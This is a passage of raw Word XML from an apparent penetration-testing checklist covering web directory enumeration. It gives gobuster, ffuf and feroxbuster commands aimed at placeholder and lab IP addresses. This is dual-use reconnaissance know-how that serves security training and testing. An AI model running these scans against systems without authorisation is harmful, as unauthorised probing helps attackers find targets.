              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00EF7034" w:rsidRPr="00EF7034">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Set a cookie value</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002F19FA">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-e</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Print full URLs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FBBD66A" w14:textId="77777777" w:rsidR="000B7A8A" w:rsidRDefault="000B7A8A" w:rsidP="00EC2BE0">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C323A8">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-p </w:t>
            </w:r>
            <w:r w:rsidRPr="00C323A8">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>X.X.X.X</w:t>
            </w:r>
            <w:r w:rsidRPr="00C323A8">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>Set a proxy to use for requests</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="457E8B1B" w14:textId="5A1A72D8" w:rsidR="00EF7034" w:rsidRPr="00D5731C" w:rsidRDefault="00EF7034" w:rsidP="00EC2BE0">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00EF7034">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-U</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EF7034">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>abc</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Username</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00EF7034">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-P</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EF7034">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>abc</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Passwords</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B7A8A" w14:paraId="27373927" w14:textId="77777777" w:rsidTr="000B7A8A">
        <w:trPr>
          <w:trHeight w:val="266"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="0AD9B0E2" w14:textId="3F595D01" w:rsidR="000B7A8A" w:rsidRDefault="000B7A8A" w:rsidP="00EC2BE0">
            <w:r>
              <w:t>49.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2389" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5C637B5B" w14:textId="77777777" w:rsidR="000B7A8A" w:rsidRDefault="000B7A8A" w:rsidP="00EC2BE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8027" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6F80472B" w14:textId="21B4698A" w:rsidR="000B7A8A" w:rsidRDefault="000B7A8A" w:rsidP="00EC2BE0">
            <w:r>
              <w:t xml:space="preserve">Use gobuster again but this time search for file types, especially do this in interesting directories discovered after the initial scan. Use the </w:t>
            </w:r>
            <w:r w:rsidRPr="003C17BE">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-x</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> flag for this and specify </w:t>
            </w:r>
            <w:r w:rsidRPr="003C17BE">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>txt, php, html, js</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>css</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003C17BE">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>(whichever).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B7A8A" w14:paraId="1424875E" w14:textId="77777777" w:rsidTr="000B7A8A">
        <w:trPr>
          <w:trHeight w:val="266"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="3D7D018D" w14:textId="0BE1A2EF" w:rsidR="000B7A8A" w:rsidRDefault="000B7A8A" w:rsidP="00EC2BE0">
            <w:r>
              <w:t>49.e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2389" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7FB14D32" w14:textId="77777777" w:rsidR="000B7A8A" w:rsidRDefault="000B7A8A" w:rsidP="00EC2BE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8027" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4FEB623C" w14:textId="54B060F9" w:rsidR="000B7A8A" w:rsidRDefault="000B7A8A" w:rsidP="00EC2BE0">
            <w:r>
              <w:t>A good search to try using when enumerating for web pages is:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="000B7A8A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">gobuster </w:t>
            </w:r>
            <w:r w:rsidRPr="000B7A8A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">dir -u </w:t>
            </w:r>
            <w:r w:rsidRPr="000B7A8A">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">http://TARGET.IP.ADD.RESS </w:t>
            </w:r>
            <w:r w:rsidRPr="000B7A8A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-w </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="000B7A8A">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt</w:t>
            </w:r>
            <w:r w:rsidRPr="000B7A8A">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="000B7A8A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-x php</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r w:rsidRPr="000B7A8A">
              <w:t>(All one line)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C17BAB" w14:paraId="123E5AE4" w14:textId="77777777" w:rsidTr="000B7A8A">
        <w:trPr>
          <w:trHeight w:val="266"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="23769E25" w14:textId="0E815BC4" w:rsidR="00C17BAB" w:rsidRDefault="00C17BAB" w:rsidP="00EC2BE0">
            <w:r>
              <w:t>49.f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2389" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="189DC836" w14:textId="2082255C" w:rsidR="00C17BAB" w:rsidRDefault="00C17BAB" w:rsidP="00EC2BE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>ffuf</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00C17BAB">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(ffuf is installed on Kali by default)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8027" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="663DFEE8" w14:textId="77777777" w:rsidR="00C17BAB" w:rsidRPr="00C17BAB" w:rsidRDefault="00C17BAB" w:rsidP="00EC2BE0">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C17BAB">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>IF THERE IS A WEBSITE OR WEBSITE PAGE IN PARTICULAR YOU WANT TO ENUMERATE WITH FUZZING, TRY FFUF, OTHERWISE, SKIP.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47304A05" w14:textId="77777777" w:rsidR="00C17BAB" w:rsidRDefault="00C17BAB" w:rsidP="00EC2BE0">
            <w:r>
              <w:t>ffuf allows typical directory discovery, virtual host discovery (without DNS records) and GET and POST parameter fuzzing</w:t>
            </w:r>
            <w:r w:rsidR="00936B55">
              <w:t>. To use ffuf:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="364177DC" w14:textId="3A9326F2" w:rsidR="00936B55" w:rsidRDefault="00936B55" w:rsidP="00EC2BE0">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00936B55">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">ffuf </w:t>
            </w:r>
            <w:r w:rsidRPr="00936B55">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-w </w:t>
            </w:r>
            <w:r w:rsidRPr="00936B55">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">WORDLIST.txt </w:t>
            </w:r>
            <w:r w:rsidRPr="00936B55">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-u </w:t>
            </w:r>
            <w:r w:rsidR="00D13404" w:rsidRPr="00D13404">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>http://10.10.100.151</w:t>
            </w:r>
            <w:r w:rsidR="00D13404" w:rsidRPr="00D13404">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>/FUZZ</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78168021" w14:textId="4F680980" w:rsidR="00D13404" w:rsidRDefault="00D13404" w:rsidP="00EC2BE0">
            <w:r>
              <w:t xml:space="preserve">You will need the </w:t>
            </w:r>
            <w:r w:rsidRPr="00D13404">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">/FUZZ </w:t>
            </w:r>
            <w:r>
              <w:t>at the end of the website you wish to enumerate.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B17246" w14:paraId="52D1B27E" w14:textId="77777777" w:rsidTr="000B7A8A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="1EB12655" w14:textId="7860FDE2" w:rsidR="00B17246" w:rsidRDefault="00B17246" w:rsidP="00EC2BE0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2389" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0D183C2F" w14:textId="77777777" w:rsidR="00B17246" w:rsidRDefault="00B17246" w:rsidP="00EC2BE0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8027" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="75C99E7A" w14:textId="77777777" w:rsidR="00B17246" w:rsidRDefault="00B17246" w:rsidP="00EC2BE0"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D206161" w14:textId="5D5335A7" w:rsidR="002024A0" w:rsidRDefault="002024A0" w:rsidP="002024A0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Port, Service and Web Page Scanning:</w:t>
      </w:r>
      <w:r w:rsidR="00BC7CB4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC7CB4" w:rsidRPr="00BC7CB4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Gobuster</w:t>
      </w:r>
      <w:r w:rsidR="00C17BAB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> | ffuf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB9750C" w14:textId="3382D3B7" w:rsidR="00B17246" w:rsidRDefault="00B17246"/>
    <w:p w14:paraId="1200EE20" w14:textId="77777777" w:rsidR="006842C5" w:rsidRDefault="006842C5">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7103D218" w14:textId="07DDA7CE" w:rsidR="006842C5" w:rsidRDefault="006842C5" w:rsidP="006842C5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Port, Service and Web Page Scanning: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Feroxbuster</w:t>
      </w:r>
      <w:r w:rsidR="00004A4A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> |</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Dirsearch </w:t>
      </w:r>
      <w:r w:rsidR="00004A4A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Dirbuster</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676F23" w14:paraId="778E8F44" w14:textId="77777777" w:rsidTr="00676F23">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="74E3D5FB" w14:textId="40DD7FD4" w:rsidR="00676F23" w:rsidRDefault="003C01E2" w:rsidP="00676F23">
            <w:r>
              <w:t>50</w:t>
            </w:r>
            <w:r w:rsidR="00676F23">
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="6394E475" w14:textId="77777777" w:rsidR="00676F23" w:rsidRDefault="00676F23" w:rsidP="00676F23">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>feroxbuster</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(Remember, feroxbuster is not installed by default on Kali)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="620D5A75" w14:textId="77777777" w:rsidR="00676F23" w:rsidRPr="00EF6A12" w:rsidRDefault="00676F23" w:rsidP="00676F23">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF6A12">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>IF THERE IS A WEBSITE ASSOCIATED WITH THE IP ADDRESS. OTHERWISE, SKIP.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3554214E" w14:textId="77777777" w:rsidR="00676F23" w:rsidRDefault="00676F23" w:rsidP="00676F23">
            <w:r>
              <w:t>Use feroxbuster in a similar fashion to gobuster but feroxbuster also scans the pages it finds. It needs to be installed first onto Kali Linux, use:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005169E4">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="005169E4">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt </w:t>
            </w:r>
            <w:r w:rsidRPr="00EC2BE0">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">update </w:t>
            </w:r>
            <w:r w:rsidRPr="005169E4">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">&amp;&amp; </w:t>
            </w:r>
            <w:r w:rsidRPr="005169E4">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="005169E4">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt </w:t>
            </w:r>
            <w:r w:rsidRPr="00EC2BE0">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">install </w:t>
            </w:r>
            <w:r w:rsidRPr="006842C5">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-y</w:t>
            </w:r>
            <w:r w:rsidRPr="005169E4">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006842C5">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>feroxbuster</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00676F23" w14:paraId="709B7511" w14:textId="77777777" w:rsidTr="00676F23">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="331B0D0E" w14:textId="05493797" w:rsidR="00676F23" w:rsidRDefault="003C01E2" w:rsidP="00676F23">
            <w:r>
              <w:t>50</w:t>
            </w:r>
            <w:r w:rsidR="00676F23">
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2FD0948C" w14:textId="77777777" w:rsidR="00676F23" w:rsidRDefault="00676F23" w:rsidP="00676F23">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>feroxbuster</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6FDF9D1E" w14:textId="77777777" w:rsidR="00676F23" w:rsidRDefault="00676F23" w:rsidP="00676F23">
            <w:r>
              <w:t>Then use feroxbuster, it will be used like this:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003A3CF7">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>feroxbuster</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="003A3CF7">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-v -u </w:t>
            </w:r>
            <w:r w:rsidRPr="003A3CF7">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">http://X.X.X.X </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00EC2BE0">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-u</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00EC2BE0">
              <w:t>Target URL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00EC2BE0">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-v</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00EC2BE0">
              <w:t>Verbose output</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00676F23" w14:paraId="256ED26A" w14:textId="77777777" w:rsidTr="00676F23">
        <w:trPr>
          <w:trHeight w:val="455"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="16E7000B" w14:textId="6625BC71" w:rsidR="00676F23" w:rsidRDefault="003C01E2" w:rsidP="00676F23">
            <w:r>
              <w:t>50</w:t>
            </w:r>
            <w:r w:rsidR="00676F23">
              <w:t>.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="36F96B02" w14:textId="77777777" w:rsidR="00676F23" w:rsidRDefault="00676F23" w:rsidP="00676F23">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>dirsearch</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(Remember, feroxbuster is not installed by</w:t>
            </w:r>
